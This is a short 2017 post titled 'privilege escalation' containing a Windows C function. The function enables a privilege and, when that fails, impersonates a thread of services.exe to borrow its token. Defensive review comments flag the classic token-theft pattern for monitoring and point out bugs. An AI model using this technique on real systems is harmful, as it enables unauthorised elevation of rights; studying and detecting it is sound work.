@FadeTrack
2017-05-24T08:11:48.000000Z
提权:
/*
 * GetPrivilege - enable one privilege (LUID value `Priviliage`) for the caller.
 *
 * Strategy as written: first try RtlAdjustPrivilege against the process
 * token, then against the current thread token. Only if both fail does it
 * fall back to borrowing a token: it walks the SystemProcessInformation list,
 * finds "services.exe", opens that process's first thread for
 * THREAD_DIRECT_IMPERSONATION, impersonates it on the current thread and
 * retries RtlAdjustPrivilege on the (now impersonated) thread token.
 *
 * Review notes (defensive reading):
 *  - The impersonation is never reverted; on return the calling thread may
 *    still carry the services.exe token. Callers must assume that.
 *  - An unrelated process opening a services.exe thread with
 *    THREAD_DIRECT_IMPERSONATION followed by NtImpersonateThread is the
 *    classic token-theft shape; it is exactly the kind of cross-process
 *    thread access worth alerting on in monitoring.
 *  - Proc->Threads[0] is read without checking the entry's thread count.
 *  - The list is advanced through `*(ULONG*)&Proc`, i.e. only 32 bits of the
 *    pointer are updated; this assumes a 32-bit build.
 *
 * Returns TRUE if RtlAdjustPrivilege succeeded on any path, else FALSE.
 * NOTE(review): GetSystemInformation is a project helper; the free() at the
 * end assumes it returns a CRT-allocated buffer owned by the caller - verify.
 */
BOOL GetPrivilege(ULONG Priviliage)
{
    BOOL bRet = FALSE;
    NTSTATUS St;
    BOOLEAN bEnable;  /* previous enabled state, written by RtlAdjustPrivilege */

    /* Process token first (CurrentThread = FALSE), then thread token (TRUE). */
    bRet = NT_SUCCESS(RtlAdjustPrivilege(Priviliage, TRUE, FALSE, &bEnable)) ||
           NT_SUCCESS(RtlAdjustPrivilege(Priviliage, TRUE, TRUE, &bEnable));

    if (!bRet) {
        /* Fallback: locate services.exe and impersonate one of its threads. */
        PSYSTEM_PROCESSES_INFORMATION Processes =
            (PSYSTEM_PROCESSES_INFORMATION)GetSystemInformation(SystemProcessInformation);
        if (Processes) {
            UNICODE_STRING ProcessName = RTL_CONSTANT_STRING(L"services.exe");

            /* Entries are chained by NextEntryDelta; 0 marks the last one.
             * The increment writes the pointer through a ULONG*, so only a
             * 32-bit pointer width is handled here. */
            for (PSYSTEM_PROCESSES_INFORMATION Proc = Processes; ; *(ULONG*)&Proc += Proc->NextEntryDelta) {
                if (RtlEqualUnicodeString(&Proc->ProcessName, &ProcessName, TRUE)) {
                    HANDLE hThread;
                    OBJECT_ATTRIBUTES ObjAttr;
                    InitializeObjectAttributes(&ObjAttr, NULL, 0, 0, 0);

                    /* Threads[0] is used without checking that the entry
                     * actually has a thread. */
                    St = NtOpenThread(&hThread, THREAD_DIRECT_IMPERSONATION, &ObjAttr, &Proc->Threads[0].ClientId);
                    if (NT_SUCCESS(St)) {
                        SECURITY_QUALITY_OF_SERVICE SecurityQos = {0};
                        SecurityQos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
                        SecurityQos.ImpersonationLevel = SecurityImpersonation;
                        SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;

                        /* Current thread takes on the target thread's token.
                         * No revert follows, so this persists past return. */
                        St = NtImpersonateThread(NtCurrentThread(), hThread, &SecurityQos);
                        if (NT_SUCCESS(St)) {
                            /* Retry on the thread token now that it is impersonating. */
                            St = RtlAdjustPrivilege(Priviliage, TRUE, TRUE, &bEnable);
                            bRet = NT_SUCCESS(St);
                            if (!bRet) {
                                DbgPrint(__FUNCTION__"(): RtlAdjustPrivilege failed with status %x\n", St);
                            }
                        } else {
                            DbgPrint(__FUNCTION__"(): NtImpersonateThread failed with status %x\n", St);
                        }
                        NtClose(hThread);
                    } else {
                        DbgPrint(__FUNCTION__"(): NtOpenThread failed with status %x\n", St);
                    }
                    /* Only the first matching process is tried. */
                    break;
                }
                if (!Proc->NextEntryDelta) break;
            }
            free(Processes);
        }
    }
    return bRet;
}